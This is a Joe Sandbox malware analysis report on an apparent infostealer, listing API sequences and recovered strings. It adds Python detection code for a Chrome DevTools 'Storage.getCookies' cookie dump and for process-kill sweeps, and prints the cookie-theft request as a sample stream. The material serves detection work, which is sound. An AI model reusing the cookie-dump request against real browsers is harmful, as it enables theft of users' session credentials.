                                  • Instruction Fuzzy Hash: 1C619571D102199BCB64EFB5DD85ADE77B8BF48310F0444A8E659A7240DB38EA84DF90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                  • API String ID: 909987262-758292691
                                  • Opcode ID: 478e46b085d17860727e16a0551378e914f830b5137c0ebf75335d9ea514d167
                                  • Instruction ID: 3595da7f98a8acb6390a6b9633019ef4a1c843fe87599bb5086833028df74ef3
                                  • Opcode Fuzzy Hash: 478e46b085d17860727e16a0551378e914f830b5137c0ebf75335d9ea514d167
                                  • Instruction Fuzzy Hash: 0DA26971D012699FDF20DFA8C8807DDBBB6AF48300F1881AAD518A7341DB755E85EF91
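The strings in this function are the pieces of an HTTP/1.1 WebSocket upgrade (`Connection: Upgrade`, `Upgrade: websocket`, `Sec-WebSocket-Key`, `Sec-WebSocket-Version: 13`, a `ws://` URL and a `Host:` header) followed by the Chrome DevTools Protocol command `{"id":1,"method":"Storage.getCookies"}`, which asks a browser that exposes a debugging endpoint for every cookie it holds, already decrypted. Added detection example, not code from the Joe Sandbox report or from the sample: it parses the client side of such a session as it would appear in a capture of the loopback interface (RFC 6455 masked text frames after the HTTP handshake) and flags a cookie-dump method. The sample stream at the bottom is constructed; host, port, path and the Sec-WebSocket-Key are placeholders, and the report does not show how or whether the browser was started with remote debugging enabled.

```python
import json
import struct

# CDP methods that return the whole cookie jar; Storage.getCookies is the one
# recovered from the binary, the other two are the equivalent Network-domain calls.
CDP_COOKIE_METHODS = {"Storage.getCookies", "Network.getAllCookies", "Network.getCookies"}


def client_text_frame(text: str, mask: bytes = b"\x12\x34\x56\x78") -> bytes:
    """One client-to-server text frame (FIN=1, opcode 1) per RFC 6455.  Clients
    must mask, so this is the byte pattern a loopback capture would contain."""
    payload = text.encode("utf-8")
    n = len(payload)
    if n < 126:
        header = bytes([0x81, 0x80 | n])
    elif n < 0x10000:
        header = bytes([0x81, 0x80 | 126]) + struct.pack(">H", n)
    else:
        header = bytes([0x81, 0x80 | 127]) + struct.pack(">Q", n)
    return header + mask + bytes(b ^ mask[i % 4] for i, b in enumerate(payload))


def text_frames(data: bytes):
    """Yield the payload of every text frame in a raw byte stream, unmasking
    when the MASK bit is set.  Other opcodes are skipped; truncation ends it."""
    i = 0
    while i + 2 <= len(data):
        opcode, b1 = data[i] & 0x0F, data[i + 1]
        masked, n = bool(b1 & 0x80), b1 & 0x7F
        i += 2
        if n == 126:
            if i + 2 > len(data):
                return
            n, i = struct.unpack(">H", data[i:i + 2])[0], i + 2
        elif n == 127:
            if i + 8 > len(data):
                return
            n, i = struct.unpack(">Q", data[i:i + 8])[0], i + 8
        key = data[i:i + 4] if masked else b""
        i += len(key)
        payload = data[i:i + n]
        i += n
        if len(payload) < n:
            return
        if masked:
            payload = bytes(b ^ key[j % 4] for j, b in enumerate(payload))
        if opcode == 0x1:
            yield payload.decode("utf-8", "replace")


def analyse_client_stream(stream: bytes) -> dict:
    """Split the stream at the end of the HTTP headers, check for a WebSocket
    upgrade aimed at loopback, then inspect the CDP 'method' of each frame."""
    head, _, body = stream.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    hdrs = {}
    for line in lines[1:]:
        if ":" in line:
            k, v = line.split(":", 1)
            hdrs[k.strip().lower()] = v.strip()
    is_upgrade = (hdrs.get("upgrade", "").lower() == "websocket"
                  and "upgrade" in hdrs.get("connection", "").lower())
    host = hdrs.get("host", "").rsplit(":", 1)[0].lower()
    methods = []
    for text in text_frames(body):
        try:
            msg = json.loads(text)
        except ValueError:
            continue
        if isinstance(msg, dict) and isinstance(msg.get("method"), str):
            methods.append(msg["method"])
    return {
        "request_line": lines[0],
        "websocket_upgrade": is_upgrade,
        "loopback": host in {"127.0.0.1", "localhost", "[::1]"},
        "methods": methods,
        "cookie_dump": is_upgrade and any(m in CDP_COOKIE_METHODS for m in methods),
    }


# Constructed loopback stream: the header lines reproduce the fragments found in
# the binary; path, port and key are placeholders (the key is RFC 6455's own
# example value).
SAMPLE_STREAM = (
    b"GET /devtools/page/PLACEHOLDER HTTP/1.1\r\n"
    b"Host: 127.0.0.1:9222\r\n"
    b"Connection: Upgrade\r\n"
    b"Upgrade: websocket\r\n"
    b"Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\n"
    b"Sec-WebSocket-Version: 13\r\n"
    b"\r\n"
) + client_text_frame('{"id":1,"method":"Storage.getCookies"}')

if __name__ == "__main__":
    print(json.dumps(analyse_client_stream(SAMPLE_STREAM), indent=2))
```

The check keys on the JSON `method` rather than on the handshake, because the upgrade itself is identical to what any legitimate DevTools client sends; the precondition worth alerting on separately is a browser started by a non-browser parent with a remote-debugging command line, which this listing does not show.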
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC23D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC23F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC2402
                                  • lstrlen.KERNEL32(\*.*), ref: 00FC240D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC242A
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 00FC2436
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC246A
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00FC2486
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2567437900-1173974218
                                  • Opcode ID: 4c52a0406dbdf63ba864fd5113cd896fafd0804e609aa987231a3c4830f3a438
                                  • Instruction ID: 1d1363662c8fdb5350a394fb4367fa0365bd5defc4a3bca9ee5d4c0b502af69c
                                  • Opcode Fuzzy Hash: 4c52a0406dbdf63ba864fd5113cd896fafd0804e609aa987231a3c4830f3a438
                                  • Instruction Fuzzy Hash: B841603151020A8BCBB5FFA5DD86BDE77A9EF50314F045128B85AAB212CB38DC41BF90
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00FD46B9
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00FD46C9
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00FD46DB
                                  • StrCmpCA.SHLWAPI(?,?), ref: 00FD46ED
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FD4702
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00FD4711
                                  • CloseHandle.KERNEL32(00000000), ref: 00FD4718
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00FD4726
                                  • CloseHandle.KERNEL32(00000000), ref: 00FD4731
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 3836391474-0
                                  • Opcode ID: 71fd0cf7b5beac01782098932b95367e174530a3a27d204683978679f1352880
                                  • Instruction ID: 1fd55451e75e86b14d150fa3b180413f0da111ca5b53e731a16590fb13706af8
                                  • Opcode Fuzzy Hash: 71fd0cf7b5beac01782098932b95367e174530a3a27d204683978679f1352880
                                  • Instruction Fuzzy Hash: E701A1315011186BE7349BE09C8CFFE3BBCAB45B15F0400A9FA15D9184EF74A9809B61
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00FD4628
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00FD4638
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00FD464A
                                  • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00FD4660
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00FD4672
                                  • CloseHandle.KERNEL32(00000000), ref: 00FD467D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                  • String ID: steam.exe
                                  • API String ID: 2284531361-2826358650
                                  • Opcode ID: a686ada21134badee910f53808985957c01e98f3ede1812666215f4efe453821
                                  • Instruction ID: c0e455143e1115ded4b931fc2c3d9437a4cb8876581f0bacc07169990e4e65b9
                                  • Opcode Fuzzy Hash: a686ada21134badee910f53808985957c01e98f3ede1812666215f4efe453821
                                  • Instruction Fuzzy Hash: 090184715011185BD720DBE09C48FEA7BACEB09754F0401E5F909D5140EB74D9949BE5
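The routine at 00FD46B9 walks a Toolhelp32 process snapshot (TH32CS_SNAPPROCESS = 2, PROCESSENTRY32 size 0x128), compares each entry's name with StrCmpCA, opens a match with OpenProcess(PROCESS_TERMINATE = 0x1) and calls TerminateProcess on it; the routine at 00FD4628 walks the same kind of snapshot looking only for `steam.exe` and never opens a handle. Added detection example covering both, not code from the Joe Sandbox report or from the sample: it reads constructed Sysmon ProcessAccess (Event ID 10) and ProcessTerminate (Event ID 5) records and reports a source that obtains terminate-only handles (GrantedAccess exactly 0x1, the mask this code asks for) on several processes which then exit. The target names, PIDs and images are made up; the listing does not show which process names the kill routine compares against. The `steam.exe` check produces no ProcessAccess record at all because it opens nothing, so its only artefact is the string itself.

```python
from collections import defaultdict

PROCESS_TERMINATE = 0x0001     # the 00000001 desired-access value passed to OpenProcess above

# Constructed Sysmon-style records (EID 10 ProcessAccess, EID 5 ProcessTerminate)
# flattened to one "key=value|key=value" line each.  Field names follow Sysmon;
# the images, PIDs and masks are made up.  0x1410 is the usual mask of a tool
# that queries a process; the Taskmgr line is a single user-initiated kill.
SAMPLE_EVENTS = r"""
EventID=10|SourceImage=C:\Users\u\Desktop\file.exe|SourceProcessId=4120|TargetImage=C:\Program Files\Mozilla Firefox\firefox.exe|TargetProcessId=5500|GrantedAccess=0x1
EventID=5|Image=C:\Program Files\Mozilla Firefox\firefox.exe|ProcessId=5500
EventID=10|SourceImage=C:\Users\u\Desktop\file.exe|SourceProcessId=4120|TargetImage=C:\Program Files\Google\Chrome\Application\chrome.exe|TargetProcessId=6012|GrantedAccess=0x1
EventID=5|Image=C:\Program Files\Google\Chrome\Application\chrome.exe|ProcessId=6012
EventID=10|SourceImage=C:\Windows\System32\svchost.exe|SourceProcessId=900|TargetImage=C:\Windows\System32\notepad.exe|TargetProcessId=7000|GrantedAccess=0x1410
EventID=10|SourceImage=C:\Windows\System32\Taskmgr.exe|SourceProcessId=3300|TargetImage=C:\Windows\System32\notepad.exe|TargetProcessId=7000|GrantedAccess=0x1
EventID=5|Image=C:\Windows\System32\notepad.exe|ProcessId=7000
"""


def parse_events(text: str):
    """Turn the flattened lines into dicts, skipping blank lines."""
    return [dict(f.split("=", 1) for f in line.split("|"))
            for line in text.splitlines() if line.strip()]


def terminate_only_accesses(events):
    """ProcessAccess records whose mask is exactly PROCESS_TERMINATE.  Tools that
    inspect a process first (the svchost line, 0x1410) never match this."""
    return [ev for ev in events
            if ev["EventID"] == "10" and int(ev["GrantedAccess"], 16) == PROCESS_TERMINATE]


def confirmed_kills(events):
    """Pair each terminate-only access with a later ProcessTerminate of the same
    PID.  Returns {source image: [target images that exited afterwards]}."""
    kills = defaultdict(list)
    for idx, ev in enumerate(events):
        if ev["EventID"] != "10" or int(ev["GrantedAccess"], 16) != PROCESS_TERMINATE:
            continue
        pid = ev["TargetProcessId"]
        if any(e["EventID"] == "5" and e["ProcessId"] == pid for e in events[idx + 1:]):
            kills[ev["SourceImage"]].append(ev["TargetImage"])
    return dict(kills)


def kill_sweep_alerts(events, min_targets: int = 2):
    """A single kill is everyday behaviour; one source terminating several
    processes back to back is the sweep the routine above performs."""
    return {src: tgts for src, tgts in confirmed_kills(events).items()
            if len(tgts) >= min_targets}


if __name__ == "__main__":
    for src, tgts in kill_sweep_alerts(parse_events(SAMPLE_EVENTS)).items():
        print(f"{src} terminated: {tgts}")
```

Sysmon only records Event ID 10 for targets the configuration names, so the rule is only as good as the `TargetImage` include list; a sweep that uses a wider mask (for example PROCESS_ALL_ACCESS) would need the equality check relaxed to `mask & PROCESS_TERMINATE`.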
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC4B51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC4B74
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC4B7F
                                  • lstrlen.KERNEL32(00FE4CA8), ref: 00FC4B8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC4BA7
                                  • lstrcat.KERNEL32(00000000,00FE4CA8), ref: 00FC4BB3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC4BDE
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00FC4BFA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID:
                                  • API String ID: 2567437900-0
                                  • Opcode ID: e4585c5951dabebc7677010efcdabdc5fbf9bbf5837e6668309ed887fae1e036
                                  • Instruction ID: 6f1f5e0c70d3a3a32f855e3977e2aeebf9b5ae6415c76cfc828a86a1c5b70f35
                                  • Opcode Fuzzy Hash: e4585c5951dabebc7677010efcdabdc5fbf9bbf5837e6668309ed887fae1e036
                                  • Instruction Fuzzy Hash: A6311F3191151A9BCB62FF65ED86FDE77B9AF90324F040128B815AB255CB38EC01BB91
                                  APIs
                                    • Part of subcall function 00FD71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00FD71FE
                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00FD2D9B
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00FD2DAD
                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00FD2DBA
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00FD2DEC
                                  • LocalFree.KERNEL32(00000000), ref: 00FD2FCA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 2b3b1f5cc54fbff598d8d4a6b5a94aa85ce0ae8e23c3c6ae319a8c09b777b38f
                                  • Instruction ID: 1b5fa1c7da6e045023fc576e708c88cf29ecd68df68e086361c5981020168ce1
                                  • Opcode Fuzzy Hash: 2b3b1f5cc54fbff598d8d4a6b5a94aa85ce0ae8e23c3c6ae319a8c09b777b38f
                                  • Instruction Fuzzy Hash: D1B10771900204CFC769CF58C948B99B7F2BB44329F2DC5AAD4089B3A6D7769D82DF80
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 2:$5&u_$<vo$<vo$naf$Jo
                                  • API String ID: 0-2900013186
                                  • Opcode ID: 63876f3653154da4120900a447aac90db1f8a2977c2fe4bea5ce9fe2d0240c59
                                  • Instruction ID: b8a1646a25d615e8f453c546b3d0eaadb12e79f69adfa13c51c0fa036256d929
                                  • Opcode Fuzzy Hash: 63876f3653154da4120900a447aac90db1f8a2977c2fe4bea5ce9fe2d0240c59
                                  • Instruction Fuzzy Hash: DDB2F2F360C2109FE304AE29EC8577ABBE5EF94720F16893DEAC4C7744EA3558048697
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: #w[w$#w[w$IA0$a8w}$j,]$j,]
                                  • API String ID: 0-496744614
                                  • Opcode ID: 6893289dd9ac240038813c3ebe8aed252283ed2d0bc7ed7f52273b07bdeb4626
                                  • Instruction ID: d95fac5a2eeb0f59947e0aa934b2044bcbc501b9d4c773991fddc6f785221f92
                                  • Opcode Fuzzy Hash: 6893289dd9ac240038813c3ebe8aed252283ed2d0bc7ed7f52273b07bdeb4626
                                  • Instruction Fuzzy Hash: AAB2F4F360C2049FE704AF29EC8567ABBE9EF94720F16493DE6C487344EA3598058797
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: (RZC$Qnr$^mu$ifb $nOq$xy{
                                  • API String ID: 0-3785139987
                                  • Opcode ID: b6502073cb30078b3dc7ce910bd5b42f0de07363eda3442339116a272760814a
                                  • Instruction ID: 29d4b05eb10cc7491a607f6517dabc2883872bc61b739007b17754fa33207e76
                                  • Opcode Fuzzy Hash: b6502073cb30078b3dc7ce910bd5b42f0de07363eda3442339116a272760814a
                                  • Instruction Fuzzy Hash: DAA205F360C2149FE7046E2DEC8577ABBE9EF94360F1A493DEAC4C7740E63558018696
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00FD2C42
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FD2C49
                                  • GetTimeZoneInformation.KERNEL32(?), ref: 00FD2C58
                                  • wsprintfA.USER32 ref: 00FD2C83
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID: wwww
                                  • API String ID: 3317088062-671953474
                                  • Opcode ID: 8d02c7dc98cbd814a9b7f2d0c9ba018ab7ff155712deecebac20634313689d4e
                                  • Instruction ID: 9a0e0c383f7f3a3d74f9296ba9aee859cc62f3246bba2c8331250cb039ade631
                                  • Opcode Fuzzy Hash: 8d02c7dc98cbd814a9b7f2d0c9ba018ab7ff155712deecebac20634313689d4e
                                  • Instruction Fuzzy Hash: 4E01F771A00604ABCB2C8B98DC09B6DBBADEB84721F04432AF925DB3C0D774590087D2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: F8g^$Fu+$QQ}[$`[}$o|~
                                  • API String ID: 0-3913461928
                                  • Opcode ID: d2870c790b67cd0ac8229ded7b88d8d3b0d9a66dbb783b79a02a91802633abe0
                                  • Instruction ID: 7daaa6d3c691a3986f6dad92d52c285e8d9dff5b34168d3278119cf1aa227323
                                  • Opcode Fuzzy Hash: d2870c790b67cd0ac8229ded7b88d8d3b0d9a66dbb783b79a02a91802633abe0
                                  • Instruction Fuzzy Hash: 76B24BF3A0C214AFE3046E2DEC8567ABBE5EF94720F16463DEAC4C3744EA3558018697
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00FB775E
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FB7765
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00FB778D
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00FB77AD
                                  • LocalFree.KERNEL32(?), ref: 00FB77B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
